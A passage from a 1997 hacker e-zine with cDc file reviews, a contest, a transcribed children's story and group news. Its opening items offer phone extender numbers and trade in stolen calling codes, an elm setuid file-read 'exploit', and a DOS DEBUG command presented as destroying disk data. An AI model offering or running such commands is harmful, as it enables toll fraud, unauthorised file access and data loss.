capacitor, a variable resistor, and some wires and a box to put it in, mail me and I'll tell you how. That stuff shouldn't cost you much and I forgot your email address but I'm sure you'll read this super-k-rad mag! [So will 2,000 others.] - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - sprint wats extenders: 1-800-877-8000 950-1033 If anyone wants to hack out some of these I'll trade you k0dez do you can call ld boards to get more w4r3z. oh wait, those are 'k0dez' right? Well, I need them for something more important then free warez or free phone calls so I'll give you two k0dez for one so you can jizz over twice as many warez.. ok? [Khelbin's isn't usually this witty...] - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Oh, here's something cool I found you might want to check. In unix, elm should not be setuid except for setuid mail on some platforms. I know almost everyone that will read this probably has an account on connix and they don't have this bug ( ...uh.. anymore. tnx to me) so don't bother. Anyways, elm has a file include flag (elm -i) which will include a file into your edit buffer. If elm was to be setuid root, I could then read any file on the system. exploit: elm -i - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -- - Here's another little destructive peice of code in DOS DEBUG.EXE w 1 2 1 100 Enter that at the - prompt and slam enter.. don't do this on a computer you want to use at all though. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - THE CULT OF THE DEAD COW HAS BELCHED! (and now we shall review this hoyl methane.) Reviewed by Rybread General Notes: I was but too happy to snag these files when they came out. I've graded them 1-10 on the bases of the other cDc files, with a 5 actually being average, not a 7. The average of these ten new files is 5.9, and that seems about right. Only a couple of hum dingers and no real stink pots, but a couple that we're slightly smelly. The bottom header has remains the same as the 95 and 96 one, sadly absent of any BBS numbers, though I'm aware that some of them are still up. Now to the feast, in reverse order cause thats the way, uh-huh uh-huh, I like it, uh-huh uh-huh. cDc 330 Happyland Cell Block 90210 by G. Allen Perry Hmm.. I guess they saved the worst for last. While not hideous or geometric, this one is defintly on the poor side. It consists of an odd type of prison, which we really don't get too see as the story is very small. Only a a hint of the classic cDc sodomy can be found within. ** cDc 329 Quadro-Pounder by Drunkfux Call me a glutton for 3l1t3 speach, but I really liked this one. How tough can it be for a carnivorious young fellow to order something his way? Well, of course he does it with elite speek! Short, humerous and has a great moral at the end. ******* cDc 328 Pantslessness by Mark Buda Classic Cow with a hefty thesaurus! I wish it was longer. ********* cDc 327 Vulnerabilities in the S/KEY One-Time by Mudge Almost anytime the Cult does a H/P file, its usually purty good and this time is no exception. It does a good job of explaining its topic in normspeach and has slightly humerous examples. I'm just not sure how useful this would be to everyone on the whole. ***** cDc 326 The Great Southern Fire God by John Crow Good prose, but slightly boring leaving me wondering why I should care about the point. A good definition of an average cDc file. ***** cDc 325 Zen of Skateboarding, Part 3: Flowing Stream by Thoai Tran I've only ever skimmed the other parts, so from an individual view on this file I can say I really enjoyed it!! I plan on reading the fist two parts after I'm done with this review. The chaos theroy explained via the art of skateboarding. ******** cDc 324 Painted Stranger by Weasel Boy This one is an Oreo cookie. Weak start, GREAT middle, weak ending. The part I like in the middle is where it touches on the mana theroy, that man creates god and the like, but it ends with an attempt at serious incest memories and cliches. Incest usually works in cDc but not when it's serious. **** cDc 323 CYBERsitter by Peacefire Some propiganda against yet another Web Censor. Some valid points, but I've heard it all before and know that censorship sucks, esp. when it malifunctions (won't allow you to visit things to do with the Hollow-Cost). Some nice specifics were brought up, but was this really needed? *** cDc 322 Pariah '67 by Matt Brown A "Make you think about your own self" story, with nice dissecting interludes throughout. What would you of done? Also, football was mentioned and no shower sodomy. ****** cDc 321 Nineteen Seventy-Seven by OXblood Ruffian The best was first, but reviewed last. Yeah. OXblood is truly one of the Cult's most gifted writers and relativy new. I hope he never stops his great insights, even if I don't agree with everything a lot of the stuff are pure gems of nihilistical wit. A great look from 1977-84 with scary things about Elvis and thoughts on the futer. Great stuff. ********** ruaculteruaculteruaculteruaculteruaculteruaculteruaculteruaculteruaculteruacul * *Philosophy with Khelbin * Today I will proove that the statement "Anything is possible" is logically incorrect. Saying "anything is possible" is the equivilant of saying "nothing is impossible". From "nothing is impossible", we can draw a conclusion that "it is impossible for anything to be impossible". We have just come to an extreme contradiction. Lets look at that statement closely: "it is impossible for anything to be impossible" It is obviously a false statement because you are saying something is impossible while you are also saying nothing is impossible at the same time. Hence, people who say "nothing is impossible" are either full of shit or the world is in big trouble. [I've had that on my old web page for almost a year now...] - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - || CONTEST Ode to Atari Programmers //\\ Premise: Remember your Atari 2600? Did you realize that most of those games fit on a 4k chip? That's 4096 charecters! Combat, with its 32 built-in variations, was on a 2k chip. We challenge you to: Rulez: 1) Write a game 4096 (4k) bytes or less 2) It can be the compiled version, just the code or have to be run with special software. 3) Mail it to rybread@anok4u2.org with "4k" in the subject line. 4) Also you may have two lines for instructions or whatnot, like where to FTP stuff that may be needed to play it. 5) Myself and some selected judges will choose 3-5 to appear in the next issue, or maybe issue 3 where the whole wide world will be able to choose who has made the best mini-game. 6) Let Guam be with you. 7) There will be a prize. Just not sure what yet :) Classical Children's Literature =--=--=--=--=--=--=--=--=--=--= Cream of Creature from the School Cafeteria By Mike Thalet Illus. by Jared Lee ISBN 0-380-89862-4 Avon Camelot "A Snuggle & Read Story Book" 1985 Transcribed by Rybread in 14 minutes with but a mere 4 typos! Pictures Stripped Notes Follow It was lunchtime. Our class walked slowly toward the cafeteria, holding our noses. We could smell the food all the way down the hall. It was making funny noises. We opened the cafeteria door. We took our trays and were about to line up... when we backed away from the lunch counter in horror! The food was moving!! It burbled and glurped in the pans. Then it slurped out of the pans, over the side of the counter, and across the cafeteria floor. It was coming at us!!! We through our lunch trays in the air and ran out the door. Mrs. Crumb, the cook, ran out of the cafeteria, shouting at the food. She tried to hit it with a serving spoon. The food blurped over her white shoes and she was gone. We ran into the main office. "Call the sheriff, call the sheriff!" we all shouted. "Now what's wrong?" said Mrs. Bagley the principal. "The food is after us!" we screamed. "Now, now," said Mrs. Bagley, opening the office door and stepping out. "There's absolutely nothing to..." GLURP! She never finished her sentence - she just disappeared into the bubbling green. We ran into her office and locked the door. Through the glass we could see the food eating all the safety posters. We dialed the sheriff. Soon we heard his siren. He burst in, took out his gun, and told the food not to move. The food moved. He shot three bullets at it. "Blup, blup, blup!" The food liked the bullets. It happily burbled and chased the sheriff all the way out of the school. We dialed the fire department. A big red engine roared up. The food was eating the flagpole. The firemen unrolled a huge hose and squirted the food with water. The food splashed merrily and took a bath. We dialed the army. A jeep pulled up. Four soldiers jumped out with flame throwers. They turned the flames on the food. The food warmed up, it bubbled over boots, and they were all eaten by a /hot lunch/! We dialed the air force. Soon two jet planes roared overhead. The pilots spotted the food for our jungle gym. They each dropped a bomb on the food. But the food just burped, then ate the jungle gym, the slides, and all our swings. We all screamed. Then we thought of Mickey. "Mickey is the only one who can save us. Mickey will eat anything!" We found Mickey licking the snack machine. We told him what had happened. He smiled. He walked calmly to the center of the playground. He sat down in front of the food - and took out two spoons. The food burbled, and out came Mrs. Crumb. The food burbled again, and out came Mrs. Bagley. The food burbled a third time, and out came the safety posters and the soldiers. The food looked at Mickey. Mickey looked at the food. It burbled and glurped and slithered toward him. Closer...Closer... Mickey's spoons flashed in the sunlight, and... HE ATE IT! HE ATE IT ALL!! HE ATE IT ALL UP!!! Then he licked his spoons, twirled them, out them back in his pockets, and asked for seconds. We all cheered. The mayor came. He gave Mickey a bright medal for saving the school. Mickey looked at medal, smiled, and ate it. The End Notes: I got this book in 1986 at a school book fair and have treasured it since then. Tis quite a nifty-q book and Jared Lee's illustrations are very good and I recommand picking the book up if you can. It's a steal at $2.50 U.S. dollars. I kept all gramatical stuff the same, using "/" to represent words in /italics/. The only thing I changed is paragraphing as the book was kinda lacking of it. This talented team also produced another book involving mastication entitled A HIPPOPOTAMUS ATE THE TEACHER, but I have yet to aquire it. The Minutes of 203: ------------------ The Facts Date Comments Scoop changes handle and all laugh at him. 1-1-97 Now Prof. Crane Binary gets new truck after long campaign. 1-3-97 But it doesn't work yet IIRG revives 2600 in CT. 1-3-97 Its ok, not great Onslaught is now part of IIRG 1-7-97 Congrats! Prof. Crane morphs back to Scoop 1-15-97 Much rejoicing Next Issue and Stuff + Thanx: No clue. Maybe more people will help out. Possibly a St. Jude interview and an update on CT 2600. Umm... if you have any HPA questions you can ask Khelbin, as we want to put up a Q&A HPA section creativly titled "Ask Khelbin". Ann Landers run for your life. We still need more staff and wouldn't mind someone donating a mailbot to take care of subscribers, or a good FTP site. Oh, did anyone notice that no line goes beyond 78 charecters? I've decided to make this EDIT friendly! Also big thanks to The Hac for lettign me reprint his one week old tutorial here. With its UUed stuff, it makes up 40% of the zine. Not sure if that makes me happy or sad. Also call Digital Underground BBS 281-1265. Umm.. this file should end with 666 bytes. Lets see. More delusions at the very end. L8r b e y o n d _ _ _ __ ___ _______ _ _ _ __ ___ ___________ _ _ __ ___ ______|: |_____________________________ |_______ _ _ _ __ ___ ____ |: ___/ __/ __/ _______/ |: |: | |: |: , |: |: | |: |: |: |: |: |____|: |: | |: |: |: |: |____ |: |: |: | |: |: |: |: |: |: |: |: | |: |: |: |: |: |: |: |: | _ _ _ __ ___ ____|: |_ |__ |: |__ |: | i! _ _ _ __ _________________/___________/__________/__________/ Mast Head Editor: Rybread (rybread@anok4u2.org) H/P/A "Guy": Khelbin (khelbin@connix.com) ASCII Logoist: Internal Stalker (internal@connix.com) Demo "Guy": Space available for column or whatnot. Really want someone here. If you want to write anything or have an idea for a column or whatever, just e-mail it me at rybread@anok4u2.org with "submission" in the subject line. We will print game and app reviews, other zines and URLs. Your own crippled imagination is the limit. Beyond Lost 1 (X)Feb97 farethewellmyfairyfey!